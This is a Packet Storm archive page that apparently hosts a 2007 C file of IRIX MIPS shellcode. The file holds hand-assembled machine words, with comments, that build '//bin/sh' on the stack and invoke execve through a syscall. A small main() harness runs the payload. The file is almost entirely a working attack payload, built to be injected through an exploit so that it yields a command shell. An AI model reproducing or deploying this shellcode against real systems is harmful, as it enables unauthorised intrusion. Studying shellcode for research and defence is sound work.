exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

IRIX-p_sh-asm.c

IRIX-p_sh-asm.c
Posted Jun 14, 2007
Authored by Adam Zabrocki

IRIX MIPS processor shellcode. Tested on R12000 process with system IRIX64 6.5.26m.

tags | shellcode
systems | irix
SHA-256 | a44477ca1f8cd02261ab5c90a11b65a2d02cc650a4771be9db30638bfc80f798

IRIX-p_sh-asm.c

Change Mirror Download
/*
* This is shellcode for IRIX - MIPS processors.
* Tested on R12000 processor with system IRIX64 6.5.26m
*
* --
* Best regards pi3 (pi3ki31ny) - Adam Zabrocki
* http://pi3.hack.pl
*
*/

#include <stdio.h>

unsigned long int shellcode[] = {
0x01294822, /* sub $9,$9,$9 */
0x23bdfe44, /* add $29,$29,-444 */
0xafa901bc, /* sw $9,444($29) */
0x23bd01bc, /* add $29,$29,444 */
0x23bdfffc, /* add $29,$29,-4 */
0x3c082f2f, /* lui $8,0x2f2f */
0x35087368, /* ori $8,$8,0x7368 */
0x23bdfe44, /* addi $29,$29,-444 */
0xafa801bc, /* sw $8,444($29) */
0x23bd01bc, /* addi $29,$29,444 */
0x23bdfffc, /* addi $29,$29,-4 */
0x3c082f62, /* lui $8,0x2f62 */
0x3508696e, /* ori $8,$8,0x696e */
0x23bdfe44, /* addi $29,$29,-444 */
0xafa801bc, /* sw $8,444($29) */
0x23bd01bc, /* addi $29,$29,444 */
0x23bdfffc, /* addi $29,$29,-4 */
0xafbd01bc, /* sw $29,444($29) */
0x8fa401bc, /* lw $4,444($29) */
0x208401cc, /* addi $4,$4,460 */
0x2084fe38, /* addi $4,$4,-456 */
0x01294822, /* sub $9,$9,$9 */
0x23bdfe44, /* addi $29,$29,-444 */
0xafa901bc, /* sw $9,444($29) */
0x23bd01bc, /* addi $29,$29,444 */
0x23bdfe44, /* addi $29,$29,-444 */
0xafa401b8, /* sw $4,440($29) */
0xafbd01b4, /* sw $29,436($29) */
0x8fa501b4, /* lw $5,436($29) */
0x20a501b8, /* addi $5,$5,440 */
0x01294822, /* sub $9,$9,$9 */
0x3126ffff, /* andi $6,$9,0xffff */
0x24020423, /* li $2,1059 */
0x0101010c, /* syscall */
};

int main(void) {

void *(*sym)(void)=shellcode;

sym();
printf("DONE...\n");

}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close